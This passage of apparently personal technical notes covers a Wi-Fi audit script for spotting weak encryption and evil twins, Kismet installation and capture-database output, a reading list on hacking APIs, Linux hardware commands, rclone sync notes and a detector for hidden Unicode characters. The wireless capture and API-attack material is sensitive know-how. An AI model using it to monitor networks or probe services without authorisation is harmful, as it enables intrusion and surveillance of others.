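    if 32 <= chan <= 177:          # 5 GHz band (UNII-1 through UNII-3)
        return 5000 + 5 * chan
    return None

def parse_multiline(text):
    """Split nmcli's 'KEY: value' stream into one dict per AP; a record starts at NAME:."""
    records, current = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")   # only the first colon separates key and value
        key, value = key.strip(), value.strip()
        if key == "NAME":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records

def is_locally_administered(bssid):
    """Bit 0x02 of the first octet set: the address is not from a vendor-assigned OUI."""
    return bool(int(bssid.split(":")[0], 16) & 0x02)

def audit(text):
    """Return [(AP name or SSID, finding), ...] for the listing in text."""
    findings, by_ssid = [], defaultdict(list)
    for ap in parse_multiline(text):
        name, sec, bssid = ap["NAME"], ap.get("SECURITY", ""), ap["BSSID"]
        by_ssid[ap.get("SSID", "")].append(bssid)
        if sec == "" or "WEP" in sec or ("WPA1" in sec and "WPA2" not in sec):
            findings.append((name, "weak or no encryption: %r" % sec))
        if is_locally_administered(bssid):
            findings.append((name, "locally administered BSSID " + bssid))
        chan, mhz = int(ap["CHAN"]), int(ap["FREQ"].split()[0])
        if channel_to_mhz(chan) != mhz:
            findings.append((name, "CHAN %d does not match FREQ %d MHz" % (chan, mhz)))
    # One SSID behind several BSSIDs is normal for extenders, but it is also what
    # an evil twin looks like, so it is reported for a human to judge.
    for ssid, bssids in by_ssid.items():
        if ssid and len(bssids) > 1:
            findings.append((ssid, "announced by %d BSSIDs: %s" % (len(bssids), ", ".join(bssids))))
    return findings

if __name__ == "__main__":
    for who, what in audit(SAMPLE):
        print(who, "-", what)
```

To use it on a live scan, pipe `nmcli -m multiline -f ALL dev wifi` into a file and pass its contents to audit().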
Installing
sudo apt install build-essential git libwebsockets-dev pkg-config zlib1g-dev libnl-3-dev libnl-genl-3-dev libcap-dev libpcap-dev libnm-dev libdw-dev libsqlite3-dev libprotobuf-dev libprotobuf-c-dev protobuf-compiler protobuf-c-compiler libsensors4-dev libusb-1.0-0-dev python3 python3-setuptools python3-protobuf python3-requests python3-numpy python3-serial python3-usb python3-dev python3-websockets librtlsdr0 libubertooth-dev libbtbb-dev
git clone https://www.kismetwireless.net/git/kismet.git
cd kismet
./configure
make
sudo make suidinstall
sudo usermod -aG kismet $USER
newgrp -
groups
Ref: https://www.kismetwireless.net/docs/readme/quickstart/ and https://www.kismetwireless.net/docs/readme/starting_kismet/
This will add the key and repo, then install. I have had problems with...
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo apt-key add -
echo 'deb https://www.kismetwireless.net/repos/apt/release/kali kali main' | sudo tee /etc/apt/sources.list.d/kismet.list
sudo apt update
sudo apt install kismet
$ sudo kismetdb_to_pcap -i Kismet-20220826-20-36-19-1.kismet -o Kismet-20220826-20-36-19-1.kismet.pcap
[sudo] password for parth:
Done...
-rw-r--r-- 1 root 298475520 Aug 26 21:16 Kismet-20220826-20-36-19-1.kismet
-rw-r--r-- 1 root 208045928 Aug 26 21:16 Kismet-20220826-20-36-19-1.kismet.pcap

$ sudo kismetdb_statistics --help
Kismetdb statistics
usage: kismetdb_statistics [OPTION]
 -i, --in [filename]          Input kismetdb file
 -s, --skip-clean             Don't clean (sql vacuum) input database
 -j, --json                   Dump stats as a JSON dictionary

$ sudo kismetdb_statistics -i Kismet-20220826-20-36-19-1.kismet
* Cleaning database 'Kismet-20220826-20-36-19-1.kismet'...
KismetDB version: 8
Packets: 472536
Non-packet data: 6
Devices: 182
Devices seen between: 2022-08-26 20:36:20 (1661546180) to 2022-08-27 01:12:07 (1661562727)
2 datasources
    wlan0 wlan0 5FE308BD-0000-0000-0000-B07D64E7BAA3 linuxwifi
        Hardware: iwlwifi
        Packets: 472415
        Hop rate: 5.000000/second
        Hop channels: 1, 1HT40+, 2, 3, 4, 5, 6, 6HT40-, 6HT40+, 7, 8, 9, 10, 11, 11HT40-, 12, 13, 36, 36HT40+, 36VHT80, 36VHT160, 40, 40HT40-, 40VHT80, 44, 44HT40+, 44VHT80, 48, 48VHT80, 52, 52HT40+, 56, 56HT40-, 56VHT80, 60, 60HT40+, 60VHT80, 64, 64HT40-, 64VHT80, 100, 100HT40+, 100VHT80, 100VHT160, 104, 104HT40-, 104VHT80, 108, 108HT40+, 108VHT80, 112, 112HT40-, 112VHT80, 116, 116HT40+, 116VHT80, 120, 120HT40-, 120VHT80, 124, 124HT40+, 124VHT80, 128, 128HT40-, 128VHT80, 132, 132HT40+, 132VHT80, 136, 136HT40-, 136VHT80, 140, 140VHT80, 144, 144HT40-, 144VHT80, 149, 149HT40+, 149VHT80, 153, 153HT40-, 153VHT80, 157, 157HT40+, 157VHT80, 161, 161HT40-, 161VHT80, 165
    hci0 hci0 91DD0AE4-0000-0000-0000-B07D64E7BAA7 linuxbluetooth
        Hardware: linuxhci
        Packets: 6
Packet tags found in log:
    DOT11_BEACON_SSID
    DOT11_RESPONSE_SSID
Location data: None
Breadcrumb travel distance: 0 Km
Packets with location: 0
Data with location: 0

$ sudo kismetdb_clean --help
Kismetdb Cleanup
Performs a basic cleanup of Kismetdb logs with an incomplete journal file
usage: kismetdb_clean [OPTION]
 -i, --in [filename]          Input kismetdb file

$ sudo kismetdb_clean --in Kismet-20220826-20-36-19-1.kismet
* Cleaning database 'Kismet-20220826-20-36-19-1.kismet'...
After cleanup
-rw-r--r-- 1 root 298475520 Aug 26 21:20 Kismet-20220826-20-36-19-1.kismet
┌──(parth㉿Parth)-[~]
└─$ xmllint --help
Unknown option --help
Usage : xmllint [options] XMLfiles ...
    Parse the XML files and output the result of the parsing
    --version : display the version of the XML library used
    --debug : dump a debug tree of the in-memory document
    --shell : run a navigating shell
    --debugent : debug the entities defined in the document
    --copy : used to test the internal copy implementation
    --recover : output what was parsable on broken XML documents
    --huge : remove any internal arbitrary parser limits
    --noent : substitute entity references by their value
    --noenc : ignore any encoding specified inside the document
    --noout : don't output the result tree
    --path 'paths': provide a set of paths for resources
    --load-trace : print trace of all external entities loaded
    --nonet : refuse to fetch DTDs or entities over network
    --nocompact : do not generate compact text nodes
    --htmlout : output results as HTML
    --nowrap : do not put HTML doc wrapper
    --valid : validate the document in addition to std well-formed check
    --postvalid : do a posteriori validation, i.e after parsing
    --dtdvalid URL : do a posteriori validation against a given DTD
    --dtdvalidfpi FPI : same but name the DTD with a Public Identifier
    --quiet : be quiet when succeeded
    --timing : print some timings
    --output file or -o file: save to a given file
    --repeat : repeat 100 times, for timing or profiling
    --insert : ad-hoc test for valid insertions
    --compress : turn on gzip compression of output
    --html : use the HTML parser
    --xmlout : force to use the XML serializer when using --html
    --nodefdtd : do not default HTML doctype
    --push : use the push mode of the parser
    --pushsmall : use the push mode of the parser using tiny increments
    --memory : parse from memory
    --maxmem nbbytes : limits memory allocation to nbbytes bytes
    --nowarning : do not emit warnings from parser/validator
    --noblanks : drop (ignorable?) blanks spaces
    --nocdata : replace cdata section with text nodes
    --format : reformat/reindent the output
    --encode encoding : output in the given encoding
    --dropdtd : remove the DOCTYPE of the input docs
    --pretty STYLE : pretty-print in a particular style
                     0 Do not pretty print
                     1 Format the XML content, as --format
                     2 Add whitespace inside tags, preserving content
    --c14n : save in W3C canonical format v1.0 (with comments)
    --c14n11 : save in W3C canonical format v1.1 (with comments)
    --exc-c14n : save in W3C exclusive canonical format (with comments)
    --nsclean : remove redundant namespace declarations
    --testIO : test user I/O support
    --catalogs : use SGML catalogs from $SGML_CATALOG_FILES
                 otherwise XML Catalogs starting from
                 file:///etc/xml/catalog are activated by default
    --nocatalogs: deactivate all catalogs
    --auto : generate a small doc on the fly
    --xinclude : do XInclude processing
    --noxincludenode : same but do not generate XInclude nodes
    --nofixup-base-uris : do not fixup xml:base uris
    --loaddtd : fetch external DTD
    --dtdattr : loaddtd + populate the tree with inherited attributes
    --stream : use the streaming interface to process very large files
    --walker : create a reader and walk though the resulting doc
    --pattern pattern_value : test the pattern support
    --chkregister : verify the node registration code
    --relaxng schema : do RelaxNG validation against the schema
    --schema schema : do validation against the WXS schema
    --schematron schema : do validation against a schematron
    --sax1: use the old SAX1 interfaces for processing
    --sax: do not build a tree but work just at the SAX level
    --oldxml10: use XML-1.0 parsing rules before the 5th edition
    --xpath expr: evaluate the XPath expression, imply --noout

Libxml project home page: https://gitlab.gnome.org/GNOME/libxml2
--------
Hacking APIs
Things to print and study:
https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/
https://www.wallarm.com/what/how-to-hack-api-in-60-minutes-with-open-source
https://nordicapis.com/5-ways-to-hack-an-api-and-how-to-defend/
https://securityboulevard.com/2021/07/for-hackers-apis-are-low-hanging-fruit/
https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
https://www.zaproxy.org/blog/2017-04-03-exploring-apis-with-zap/
https://www.zaproxy.org/blog/2017-06-19-scanning-apis-with-zap/
https://github.com/dwisiswant0/wadl-dumper
https://github.com/SmartBear/soapui
https://github.com/arainho/awesome-api-security
https://templth.wordpress.com/2014/12/15/designing-a-web-api/

API testing with a web browser
In the browser address bar, compose a query URL for the API to access. The format of the query URL is:
https://hostname/api?apikey=value
hostname - hostname listed for the API service
api - name of the API that is part of the URL provided in the API documentation
? - only used in case of options (key=value pairs) separated with &
options (key=value pairs):
type=json - API data format
key=0a1b3c4d5e6f7g8h9i0j1k2l3m412356 - API key provided after registering an application
Example constructed query:
https://gw.its.yale.edu/soa-gateway/buildings/feed?type=json&apikey=0a1b3c4d5e6f7g8h9i0j1k2l3m412345
*apikey in the example is not a valid API key
--------
This is an interesting list of Commands
https://nixware.net/
This can be achieved via the following executables.
List all components: lshw -short
Or individually:
List the installed hard drives (brand, model): lshw -class disk
View partition info, including RAID: lsblk
View installed processor: lscpu
List PCI cards and controllers: lspci
List main board brand and model: dmidecode -t 2
List network card: lshw -short | grep network
List RAM modules and capacity: dmidecode --type 17 - see the "Part Number" and google the code. Example: Part Number: CT102464BA160B.C16 -> Crucial
Power supply: dmidecode --type 39
Sensors information:
apt-get install lm-sensors
sensors-detect
sensors
Remove all trailing spaces
Find > Replace...
Find What: [ \t]+\n
Replace With: \n
Replace All
This tool is used to sync files between my laptop and Google Drive.
https://rclone.org/drive/
Note that rclone runs a webserver on your local machine to collect the token as returned from Google if you use auto config mode. This only runs from the moment it opens your browser to the moment you get back the verification code. This is on http://127.0.0.1:53682/ and it may require you to unblock it temporarily if you are running a host firewall, or use manual mode.
List directories in top level of your drive
rclone lsd remote:
List all the files in your drive
rclone ls remote:
To copy a local directory to a drive directory called backup
rclone copy /home/source remote:backup
When rclone downloads a Google doc it chooses a format to download depending upon the --drive-export-formats setting. By default the export formats are docx,xlsx,pptx,svg which are a sensible default for an editable document.
When choosing a format, rclone runs down the list provided in order and chooses the first file format the doc can be exported as from the list. If the file can't be exported to a format on the formats list, then rclone will choose a format from the default list.
If you prefer an archive copy then you might use --drive-export-formats pdf, or if you prefer openoffice/libreoffice formats you might use --drive-export-formats ods,odt,odp.
When importing files into Google Drive, rclone will convert all files with an extension in --drive-import-formats to their associated document type. rclone will not convert any files by default, since the conversion is a lossy process.
Sometimes, for no reason I've been able to track down, drive will duplicate a file that rclone uploads. Drive, unlike all the other remotes, can have duplicated files.
Duplicated files cause problems with the syncing and you will see messages in the log about duplicates.
Use rclone dedupe to fix duplicated files.
Note that this isn't just a problem with rclone, even Google Photos on Android duplicates files on drive sometimes.
rclone sync
https://rclone.org/commands/rclone_sync/
Sync the source to the destination, changing the destination only. Doesn't transfer files that are identical on source and destination, testing by size and modification time or MD5SUM. Destination is updated to match source, including deleting files if necessary (except duplicate objects, see below). If you don't want to delete files from destination, use the copy command instead.
Important: Since this can cause data loss, test first with the --dry-run or the --interactive/-i flag.
rclone sync -i SOURCE remote:DESTINATION
Note: Use the -P/--progress flag to view real-time transfer statistics
This is some additional info that looks very helpful:
https://linuxpip.org/rclone-examples/
https://invisible-characters.com/#:~:text=Invisible%20Unicode%20characters?,+2800%20BRAILLE%20PATTERN%20BLANK).
In Unicode there are a lot of invisible characters: regular white-space characters (e.g. U+0020 SPACE), language-specific fillers (e.g. U+3164 HANGUL FILLER of the Korean Hangul alphabet), or special characters (e.g. U+2800 BRAILLE PATTERN BLANK). While all of these have a specific meaning in their natural context, they can be used in various applications that don't allow for regular whitespace characters.
View invisible characters
https://invisible-characters.com/view.html
Here you can view invisible characters inside a block of text. Just copy and paste your text (which contains invisible characters) into the text box on that page and click the "View!" button.
All about invisible (hidden) text and characters
https://www.onlyoffice.com/blog/2021/12/invisible-text-invisible-characters/
Hidden text or white fonting
Hidden text is a way to insert invisible characters or words into a web page or an electronic document. Most often the font color is set to the same color as the background so that the additional content is hidden from sight.
Hidden unreadable text can be used for Search Engine Optimization (SEO) techniques on web pages: the same keyword is added many times in an attempt to gain a higher ranking in search engines like Google, Bing, or Yahoo. It can also be used to add hidden phrases unrelated to the content in order to gain additional traffic.
In some cases, inexperienced users format text documents or slides with invisible characters. Displaying the hidden characters is also the way to find and adjust such an imperfect layout.
Also, https://www.researchgate.net/publication/344981371_Combining_Invisible_Unicode_Characters_To_Hide_Information_In_A_Text_Document/fulltext/5f9faeee458515b7cfb2bd5c/Combining-Invisible-Unicode-Characters-To-Hide-Information-In-A-Text-Document.pdf
Also, https://null-byte.wonderhowto.com/how-to/use-zero-width-characters-hide-secret-messages-text-even-reveal-leaks-0198692/
Also, https://330k.github.io/misc_tools/unicode_steganography.html
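The pages above describe how zero-width and filler characters can carry hidden text; the defender's counterpart is finding them. This added example (not code from any of the linked pages) reports every code point in a string that renders as nothing, with its position and Unicode name, groups them into runs (the shape a zero-width payload takes), and strips them. The sample text and the hypothetical EXTRA_INVISIBLE list are constructed here.

```python
# Added example: locate, group and strip invisible Unicode characters.
import unicodedata

# Code points that Unicode files as letters or symbols yet render blank:
# soft hyphen, Hangul fillers, Mongolian vowel separator, Braille blank,
# Hangul filler (U+3164) and halfwidth Hangul filler.
EXTRA_INVISIBLE = {0x00AD, 0x115F, 0x1160, 0x180E, 0x2800, 0x3164, 0xFFA0}

def is_invisible(ch):
    """True for code points that occupy no visible glyph in ordinary text."""
    if ord(ch) in EXTRA_INVISIBLE:
        return True
    cat = unicodedata.category(ch)
    if cat == "Cf":                  # format chars: ZWSP, ZWNJ, ZWJ, WJ, BOM, bidi marks ...
        return True
    if cat in ("Zs", "Zl", "Zp") and ch != " ":   # non-ASCII spaces and separators
        return True
    return False

def find_invisible(text):
    """Return [(index, 'U+XXXX', unicode name), ...] for each invisible character."""
    hits = []
    for i, ch in enumerate(text):
        if is_invisible(ch):
            hits.append((i, "U+%04X" % ord(ch), unicodedata.name(ch, "<unnamed>")))
    return hits

def hidden_runs(text):
    """Group consecutive invisible characters into [(start, length), ...]."""
    runs, start = [], None
    for i, ch in enumerate(text):
        if is_invisible(ch):
            if start is None:
                start = i
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, len(text) - start))
    return runs

def strip_invisible(text):
    """Return text with every invisible character removed."""
    return "".join(ch for ch in text if not is_invisible(ch))

# Constructed sample: a plain sentence with a zero-width run planted after
# "report" and a Hangul filler planted before the final full stop.
SAMPLE = "Quarterly report\u200b\u200c\u200d\u200b\u2060 is attached\u3164."

if __name__ == "__main__":
    for idx, cp, name in find_invisible(SAMPLE):
        print(idx, cp, name)
    print(hidden_runs(SAMPLE))
    print(repr(strip_invisible(SAMPLE)))
```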
---[End of File]---